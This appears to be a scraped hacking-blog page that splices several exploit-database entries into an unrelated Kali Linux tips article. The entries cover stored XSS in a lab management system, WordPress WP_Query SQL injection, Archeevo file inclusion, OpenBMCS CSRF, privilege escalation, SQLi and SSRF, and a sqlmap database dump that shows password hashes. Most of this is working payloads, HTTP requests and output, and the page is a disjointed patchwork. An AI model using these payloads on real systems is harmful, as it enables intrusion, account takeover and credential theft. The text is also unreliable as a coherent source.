#Exploit Title: Online Diagnostic Lab Management System 1.0 - Stored Cross Site Scripting (XSS)
#Date: 11/01/2022
#Exploit Author: Himash
#Vendor Homepage: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/odlms.zip
#Version: 1.0
#Tested on: Kali Linux
Online Diagnostic Lab Management System 1.0 is vulnerable to stored cross-site-scripting.
Stored cross-site scripting (persistent XSS) arises when an application receives its data from
an untrusted source and includes that data within its responses in an unsafe way.
#Steps to Reproduce
1. Login to the admin account with username 'admin' and password 'admin123'
2. Navigate to the 'User List' option
3. Create new user by adding following payload in
First Name and Last Name fields.
<image src/onerror=prompt(document.cookie)>
4. XSS payload will be triggered in the page http://localhost/odlms/admin/?page=user/list
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863128671
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
There are a lot of tips in our use of kali penetration and work, you know? This article will show you these tips so that your changes can complete the required work. Of course these tips are suitable for other debian series distributions.
Modify kali Linux time
For modification time, we can select the relevant time zone when installing kali. As long as kali is connected to the network, the time will be automatically updated. If you accidentally set the wrong time zone, or take a plane to the United States to conduct penetration, then you need to modify your time.
View current time zone information
timedatectl display information 
List available time zones
timedatectl list-timezones 
Set the time zone
sudo timedatectl set-timezone Africa/Conakry update time
sudo timedatectl set-ntp on
Looking for public network IP address in Kali Linux
What is the difference between local IP and public IP?
If your system is connected to the Internet, you are likely to have used at least two IP addresses on your system. One IP address is the local address of the system, and the other IP address is the address you are connected to by the device on the Internet. This is an IP address that can be routed on the World Wide Web, allowing you to connect to other servers and routers around the world.
We can easily view local IP using ifconfig
How to obtain public IP?
echo $(wget -qO - https://api.ipify.org)
or
echo $(curl -s https://api.ipify.org) 
How to install Java JDK in Kali Linux
Java has been installed by default in kali. If you need to manually install other corresponding Java versions, we need to manually install them. Use the apt package manager to update the system's repository and install the default JDK package.
apt update
apt install default-jdk If you want to install a specific version of JDK, use the following command to search for the exact package you need. This will display all JDK packages available for installation.
apt-cache search Toggle between openjdkJava versions, please execute the following two commands when selecting the desired Java version.
sudo update-alternatives --config java
sudo update-alternatives --config javac
Installing Nvidia GPU driver
First ensure that kali is the latest system
Identify the graphics card you installed and verify that it is using the Nvidia open source driver.
lspci | grep -i vga
00:02.0 VGA compatible controller: NVIDIA Corporation GP106 [GeForce GTX 1060 6GB] (rev a1) Next, use the apt package manager to install the driver and CUDA toolkit with the following commands.
sudo apt install nvidia-driver nvidia-cuda-toolkit After the process is completed, restart the computer for the changes to take effect.
reboot
How to view Kali Linux version
The lsb_release -a command displays the release version, description, and operating system code. This is the easiest way to quickly find the version of Kali you are running.
As above, my kali 2021.4hostnamectl command shows us the kernel version and CPU architecture
Static hostname: kali
Icon name: computer-vm
Chassis: vm
Machine ID: ed4b436e3798434d9e90679f82be54dd
Boot ID: 40e02be28a7f41eb9dfbdb9490bb4b68
Virtualization: vmware
Operating System: Kali GNU/Linux Rolling
Kernel: Linux 5.15.0-kali2-amd64
Architecture: x86-64
Hardware Vendor: VMware, Inc.
Hardware Model: VMware Virtual Platform
Default username and password
The default username and password of Kali Linux is kali. The root password is also kali.
# Exploit Title: WorkTime 10.20 Build 4967 - Unquoted Service Path
# Discovery by: Yehia Elghaly
# Date: 30-12-2021
# Vendor Homepage: https://www.worktime.com/
# Software Link: https://www.worktime.com/download/worktime_corporate.exe
# Tested Version: 10.20 Build Build 4967
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 7 x86 - Windows Server 2016 x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
WorkTime Server srvWorkTimeServer
C:\WorkTime\WorkTimeServerService.exe
Auto
WorkTime Reports Scheduler WorkTimeReportsScheduler
C:\Program Files\WorkTimeAdministrator\WorkTimeReportsScheduler.exe
Auto
WorkTime Client Watcher Service WTCWatch
C:\Program Files\wtc\WTCWatch.exe WTCWatch
Auto
C:\Users\psycho>sc qc WorkTimeReportsScheduler
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WorkTimeReportsScheduler
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\WorkTimeAdministrator\WorkTimeRepo
rtsScheduler.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WorkTime Reports Scheduler
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\psycho>sc qc WTCWatch
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WTCWatch
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\wtc\WTCWatch.exe WTCWatch
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WorkTime Client Watcher Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title: WordPress Core 5.8.2 - 'WP_Query' SQL Injection
# Date: 11/01/2022
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/download/releases
# Version: < 5.8.3
# Tested on: Windows 10
# CVE : CVE-2022-21661
# [ VULNERABILITY DETAILS ] :
#This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core,
#Authentication is not required to exploit this vulnerability, The specific flaw exists within the WP_Query class,
#The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries,
#An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.
# [ References ] :
https://wordpress.org/news/category/releases
https://www.zerodayinitiative.com/advisories/ZDI-22-020
https://hackerone.com/reports/1378209
# [ Sample Request ] :
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Upgrade-Insecure_Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
action=<action_name>&nonce=a85a0c3bfa&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<inject>"]}}}
# Exploit Title: Archeevo 5.0 - Local File Inclusion
# Google Dork: intitle:"archeevo"
# Date: 01/15/2021
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://www.keep.pt/
# Software Link: https://www.keep.pt/produtos/archeevo-software-de-gestao-de-arquivos/
# Version: < 5.0
# Tested on: windows
# 1. Description
Unauthenticated user can exploit LFI vulnerability in file parameter.
# 2. Proof of Concept (PoC)
Access a page that don’t exist like /test.aspx and then you will be redirected to
https://vulnerable_webiste.com/error?StatusCode=404&file=~/FileNotFoundPage.html
After that change the file /FileNotFoundPage.html to /web.config and you be able to see the
/web.config file of the application.
https://vulnerable_webiste.com/error?StatusCode=404&file=~/web.config
# 3. Research:
https://miguelsantareno.github.io/MoD_1.pdf
# Exploit Title: OpenBMCS 2.4 - Cross Site Request Forgery (CSRF)
# Exploit Author: LiquidWorm
# Date: 26/10/2021
OpenBMCS 2.4 CSRF Send E-mail
Vendor: OPEN BMCS
Product web page: https://www.openbmcs.com
Affected version: 2.4
Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
Apache/2.4.41 (Ubuntu)
Apache/2.4.25 (Debian)
nginx/1.16.1
PHP/7.4.3
PHP/7.0.33-0+deb9u9
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5691
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5691.php
26.10.2021
--
<html>
<body>
<form action="https://192.168.1.222/core/sendFeedback.php" method="POST">
<input type="hidden" name="subject" value="FEEDBACK%20TESTINGUS" />
<input type="hidden" name="message" value="Take me to your leader." />
<input type="hidden" name="email" value="lab@zeroscience.mk" />
<input type="submit" value="Send" />
</form>
</body>
</html>
# Exploit Title: Online Resort Management System 1.0 - SQLi (Authenticated)
# Date: 15/01/2022
# Exploit Author: Gaurav Grover
# Vendor Homepage: <http://192.168.0.108/orms/admin/login.php>
# Software Link: <https://www.sourcecodester.com/php/15126/online-resort-management-system-using-phpoop-free-source-code.html>
# Version: 1.0
# Tested on: Linux and windows both
Summary:
There are a vulnerabilities in Online Resort Management System (ORMS)
1. The attacker can easily retrieved the database using sql injection.
Proof of concepts :
Database dump Manualy using SQL Injection, SQL Query & Users detaile are mentioned below:
1. After login with the admin credentials(Username : admin / Password : admin123) there is a vulnerable parameter name is id=
2. Found SQL Injection Parameter :- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2%27order%20by%2010--+
3. http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,2,3,4,5,6,7,8,9,10--+
4. (Database Name :- orms_db)
Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,database(),3,4,5,6,7,8,9,10--+
5. (Table Name :- activity_list,message_list,reservation_list,room_list,system_info,users
Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),3,4,5,6,7,8,9,10--+
6. (Username Password :- User-1 admin / 0192023a7bbd73250516f069df18b500 , User-2 cblake / 1cd74fae0a3adf459f73bbf187607ccea
Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(username,password)%20from%20users),3,4,5,6,7,8,9,10--+
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Database dump Automated using Sqlmap Tool, SQL Query & Users detaile are mentioned below:
1. Database Name:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -dbs
available databases [8]:
[*] clinic_db
[*] information_schema
[*] mtms_db
[*] mysql
[*] orms_db
[*] performance_schema
[*] phpmyadmin
[*] test
2- Dump the tables using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db --tables
Database: mtms
[6 tables]
+------------------+
| activity_list |
| message_list |
| reservation_list |
| room_list |
| system_info |
| users |
+------------------+
3- Dump the database using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db -T users --dump
Database: orms_db
Table: users
[2 entries]
+----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+
| id | type | status | avatar | username | lastname | password | firstname | middlename | last_login | date_added | date_updated |
+----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+
| 1 | 1 | 1 | uploads/avatar-1.png?v=1639468007 | admin | Admin | 0192023a7bbd73250516f069df18b500 (admin123) | Adminstrator | NULL | NULL | 2021-01-20 14:02:37 | 2021-12-14 15:47:08 |
| 5 | 2 | 1 | uploads/avatar-5.png?v=1641622906 | cblake1 | Blake | cd74fae0a3adf459f73bbf187607ccea (cblake) | Claire | NULL | NULL | 2022-01-08 14:21:46 | 2022-01-15 14:01:28 |
+----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+
# Exploit Title: OpenBMCS 2.4 - Create Admin / Remote Privilege Escalation
# Exploit Author: LiquidWorm
# Date: 26/10/2021
OpenBMCS 2.4 Create Admin / Remote Privilege Escalation
Vendor: OPEN BMCS
Product web page: https://www.openbmcs.com
Affected version: 2.4
Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.
Desc: The application suffers from an insecure permissions and privilege
escalation vulnerability. A regular user can create administrative users
and/or elevate her privileges by sending an HTTP POST request to specific
PHP scripts in '/plugins/useradmin/' directory.
Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
Apache/2.4.41 (Ubuntu)
Apache/2.4.25 (Debian)
nginx/1.16.1
PHP/7.4.3
PHP/7.0.33-0+deb9u9
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5693
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5693.php
26.10.2021
--
List current ID and permissions (read):
---------------------------------------
POST /plugins/useradmin/getUserDetails.php HTTP/1.1
Host: 192.168.1.222
Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4
Content-Length: 16
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.1.222
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.222/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
id_list%5B%5D=17
HTTP/1.1 200 OK
Date: Tue, 16 Nov 2021 20:56:53 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 692
Connection: close
Content-Type: text/html; charset=UTF-8
[{"user_id":"17","username":"testingus","email":"","expiry_date":null,"fullname":"test","phone":"","module_id":"useradmin","usermodule_permission":"1","permissions":[{"user_id":"17","module_id":"alarms","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"controllers","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"core","permissions":"0","mod_home":"0"},{"user_id":"17","module_id":"graphics","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"history","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"progtool","permissions":"1","mod_home":"0"},{"user_id":"17","module_id":"useradmin","permissions":"1","mod_home":"0"}],"human-date":""}]
List current ID and permissions (admin):
----------------------------------------
POST /plugins/useradmin/getUserDetails.php HTTP/1.1
Host: 192.168.1.222
Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4
Content-Length: 16
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.1.222
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.222/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
id_list%5B%5D=18
HTTP/1.1 200 OK
Date: Tue, 16 Nov 2021 20:56:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 725
Connection: close
Content-Type: text/html; charset=UTF-8
[{"user_id":"18","username":"testingus2","email":"testingus@test.tld","expiry_date":null,"fullname":"TestName","phone":"1112223333","module_id":"useradmin","usermodule_permission":"4","permissions":[{"user_id":"18","module_id":"alarms","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"controllers","permissions":"2","mod_home":"1"},{"user_id":"18","module_id":"core","permissions":"1","mod_home":"0"},{"user_id":"18","module_id":"graphics","permissions":"4","mod_home":"1"},{"user_id":"18","module_id":"history","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"progtool","permissions":"3","mod_home":"0"},{"user_id":"18","module_id":"useradmin","permissions":"4","mod_home":"0"}],"human-date":""}]
Escalate privileges:
--------------------
POST /plugins/useradmin/update_user_permissions.php HTTP/1.1
Host: 192.168.1.222
Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4
Content-Length: 702
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.1.222
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.222/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
permissions%5B0%5D%5Bpermissions%5D=3&permissions%5B0%5D%5BmoduleID%5D=alarms&permissions%5B0%5D%5Bmod_home%5D=1&permissions%5B1%5D%5Bpermissions%5D=2&permissions%5B1%5D%5BmoduleID%5D=controllers&permissions%5B1%5D%5Bmod_home%5D=1&permissions%5B2%5D%5Bpermissions%5D=1&permissions%5B2%5D%5BmoduleID%5D=core&permissions%5B3%5D%5Bpermissions%5D=4&permissions%5B3%5D%5BmoduleID%5D=graphics&permissions%5B3%5D%5Bmod_home%5D=1&permissions%5B4%5D%5Bpermissions%5D=3&permissions%5B4%5D%5BmoduleID%5D=history&permissions%5B4%5D%5Bmod_home%5D=1&permissions%5B5%5D%5Bpermissions%5D=3&permissions%5B5%5D%5BmoduleID%5D=progtool&permissions%5B6%5D%5Bpermissions%5D=4&permissions%5B6%5D%5BmoduleID%5D=useradmin&id=17
HTTP/1.1 200 OK
Date: Tue, 16 Nov 2021 20:58:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8
2
Create admin from read user:
----------------------------
POST /plugins/useradmin/create_user.php HTTP/1.1
Host: 192.168.1.222
Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4
Content-Length: 1010
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.1.222
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.222/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
user%5Busername%5D=testingus2&user%5Bfullname%5D=TestName&user%5Bphone%5D=1112223333&user%5Bpassword%5D=Password123&user%5BpasswordConfirm%5D=Password123&user%5Bemail%5D=testingus%40test.tld&user%5Bexpiry%5D=&permissions%5B0%5D%5BmoduleID%5D=alarms&permissions%5B0%5D%5Bpermissions%5D=3&permissions%5B0%5D%5Bmod_home%5D=1&permissions%5B1%5D%5BmoduleID%5D=controllers&permissions%5B1%5D%5Bpermissions%5D=2&permissions%5B1%5D%5Bmod_home%5D=1&permissions%5B2%5D%5BmoduleID%5D=core&permissions%5B2%5D%5Bpermissions%5D=1&permissions%5B2%5D%5Bmod_home%5D=0&permissions%5B3%5D%5BmoduleID%5D=graphics&permissions%5B3%5D%5Bpermissions%5D=4&permissions%5B3%5D%5Bmod_home%5D=1&permissions%5B4%5D%5BmoduleID%5D=history&permissions%5B4%5D%5Bpermissions%5D=3&permissions%5B4%5D%5Bmod_home%5D=1&permissions%5B5%5D%5BmoduleID%5D=progtool&permissions%5B5%5D%5Bpermissions%5D=3&permissions%5B5%5D%5Bmod_home%5D=0&permissions%5B6%5D%5BmoduleID%5D=useradmin&permissions%5B6%5D%5Bpermissions%5D=4&permissions%5B6%5D%5Bmod_home%5D=0
HTTP/1.1 200 OK
Date: Tue, 16 Nov 2021 20:18:58 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8
{"status":"success"}
PoC escalate from editor to admin:
----------------------------------
<html>
<body>
<form action="https://192.168.1.222/plugins/useradmin/update_user_permissions.php" method="POST">
<input type="hidden" name="permissions[0][permissions]" value="3" />
<input type="hidden" name="permissions[0][moduleID]" value="alarms" />
<input type="hidden" name="permissions[0][mod_home]" value="1" />
<input type="hidden" name="permissions[1][permissions]" value="2" />
<input type="hidden" name="permissions[1][moduleID]" value="controllers" />
<input type="hidden" name="permissions[1][mod_home]" value="1" />
<input type="hidden" name="permissions[2][permissions]" value="1" />
<input type="hidden" name="permissions[2][moduleID]" value="core" />
<input type="hidden" name="permissions[3][permissions]" value="4" />
<input type="hidden" name="permissions[3][moduleID]" value="graphics" />
<input type="hidden" name="permissions[3][mod_home]" value="1" />
<input type="hidden" name="permissions[4][permissions]" value="3" />
<input type="hidden" name="permissions[4][moduleID]" value="history" />
<input type="hidden" name="permissions[4][mod_home]" value="1" />
<input type="hidden" name="permissions[5][permissions]" value="3" />
<input type="hidden" name="permissions[5][moduleID]" value="progtool" />
<input type="hidden" name="permissions[6][permissions]" value="4" />
<input type="hidden" name="permissions[6][moduleID]" value="useradmin" />
<input type="hidden" name="id" value="17" />
<input type="submit" value="Esc" />
</form>
</body>
</html>
PoC create admin from editor:
-----------------------------
<html>
<body>
<form action="https://192.168.1.222/plugins/useradmin/create_user.php" method="POST">
<input type="hidden" name="user[username]" value="testingus2" />
<input type="hidden" name="user[fullname]" value="TestName" />
<input type="hidden" name="user[phone]" value="1112223333" />
<input type="hidden" name="user[password]" value="Password123" />
<input type="hidden" name="user[passwordConfirm]" value="Password123" />
<input type="hidden" name="user[email]" value="testingus@test.tld" />
<input type="hidden" name="user[expiry]" value="" />
<input type="hidden" name="permissions[0][moduleID]" value="alarms" />
<input type="hidden" name="permissions[0][permissions]" value="3" />
<input type="hidden" name="permissions[0][mod_home]" value="1" />
<input type="hidden" name="permissions[1][moduleID]" value="controllers" />
<input type="hidden" name="permissions[1][permissions]" value="2" />
<input type="hidden" name="permissions[1][mod_home]" value="1" />
<input type="hidden" name="permissions[2][moduleID]" value="core" />
<input type="hidden" name="permissions[2][permissions]" value="1" />
<input type="hidden" name="permissions[2][mod_home]" value="0" />
<input type="hidden" name="permissions[3][moduleID]" value="graphics" />
<input type="hidden" name="permissions[3][permissions]" value="4" />
<input type="hidden" name="permissions[3][mod_home]" value="1" />
<input type="hidden" name="permissions[4][moduleID]" value="history" />
<input type="hidden" name="permissions[4][permissions]" value="3" />
<input type="hidden" name="permissions[4][mod_home]" value="1" />
<input type="hidden" name="permissions[5][moduleID]" value="progtool" />
<input type="hidden" name="permissions[5][permissions]" value="3" />
<input type="hidden" name="permissions[5][mod_home]" value="0" />
<input type="hidden" name="permissions[6][moduleID]" value="useradmin" />
<input type="hidden" name="permissions[6][permissions]" value="4" />
<input type="hidden" name="permissions[6][mod_home]" value="0" />
<input type="submit" value="Cre" />
</form>
</body>
</html>
# Exploit Title: OpenBMCS 2.4 - SQLi (Authenticated)
# Exploit Author: LiquidWorm
# Date: 26/10/2021
OpenBMCS 2.4 Authenticated SQL Injection
Vendor: OPEN BMCS
Product web page: https://www.openbmcs.com
Affected version: 2.4
Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.
Desc: OpenBMCS suffers from an SQL Injection vulnerability. Input passed via
the 'id' GET parameter is not properly sanitised before being returned to the
user or used in SQL queries. This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.
Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
Apache/2.4.41 (Ubuntu)
Apache/2.4.25 (Debian)
nginx/1.16.1
PHP/7.4.3
PHP/7.0.33-0+deb9u9
Vulnerability discovered by Semen 'samincube' Rozhkov
@zeroscience
Advisory ID: ZSL-2022-5692
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5692.php
26.10.2021
--
The following PoC request demonstrates the issue (authenticated user session is required):
GET /debug/obix_test.php?id=1%22 HTTP/1.1
Host: 192.168.1.222
Cookie: PHPSESSID=ssid123ssid123ssid1234ssid
Connection: close
Response:
HTTP/1.1 200 OK
Date: Sat, 1 Jan 2022 15:09:54 GMT
Server: Apache/2.4.10 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 629
Connection: close
Content-Type: text/html; charset=UTF-8
<br />
<b>Fatal error</b>: Uncaught exception 'PDOException' with message 'SQLSTATE[HY000]: General error: 1 unrecognized token: """' in /var/www/openBMCS/classes/dbconnection.php:146
Stack trace:
#0 /var/www/openBMCS/classes/dbconnection.php(146): PDO->query('SELECT ip_addre...')
#1 /var/www/openBMCS/php/obix/obix.functions.php(289): controllerDB->querySingle('SELECT ip_addre...', true)
#2 /var/www/openBMCS/debug/obix_test.php(16): sendObixGetTocontroller(Object(controllerDB), '1"', '/obix/config')
#3 {main}
thrown in <b>/var/www/openBMCS/classes/dbconnection.php</b> on line <b>146</b><br />
# Exploit Title: OpenBMCS 2.4 - Server Side Request Forgery (SSRF) (Unauthenticated)
# Exploit Author: LiquidWorm
# Date: 26/10/2021
OpenBMCS 2.4 Unauthenticated SSRF / RFI
Vendor: OPEN BMCS
Product web page: https://www.openbmcs.com
Affected version: 2.4
Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.
Desc: Unauthenticated Server-Side Request Forgery (SSRF) and Remote File Include
(RFI) vulnerability exists in OpenBMCS within its functionalities. The application
parses user supplied data in the POST parameter 'ip' to query a server IP on port
81 by default. Since no validation is carried out on the parameter, an attacker
can specify an external domain and force the application to make an HTTP request
to an arbitrary destination host. This can be used by an external attacker for
example to bypass firewalls and initiate a service and network enumeration on the
internal network through the affected application, allows hijacking the current
session of the user, execute cross-site scripting code or changing the look of
the page and content modification on current display.
Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
Apache/2.4.41 (Ubuntu)
Apache/2.4.25 (Debian)
nginx/1.16.1
PHP/7.4.3
PHP/7.0.33-0+deb9u9
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5694
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5694.php
26.10.2021
--
POST /php/query.php HTTP/1.1
Host: 192.168.1.222
Content-Length: 29
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.1.222
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.222/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
ip=www.columbia.edu:80&argu=/
HTTP/1.1 302 Found
Date: Tue, 14 Dec 2021 20:26:47 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=gktecb9mjv4gp1moo7bg3oovs3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: ../login.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32141
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<!-- developed by CUIT -->
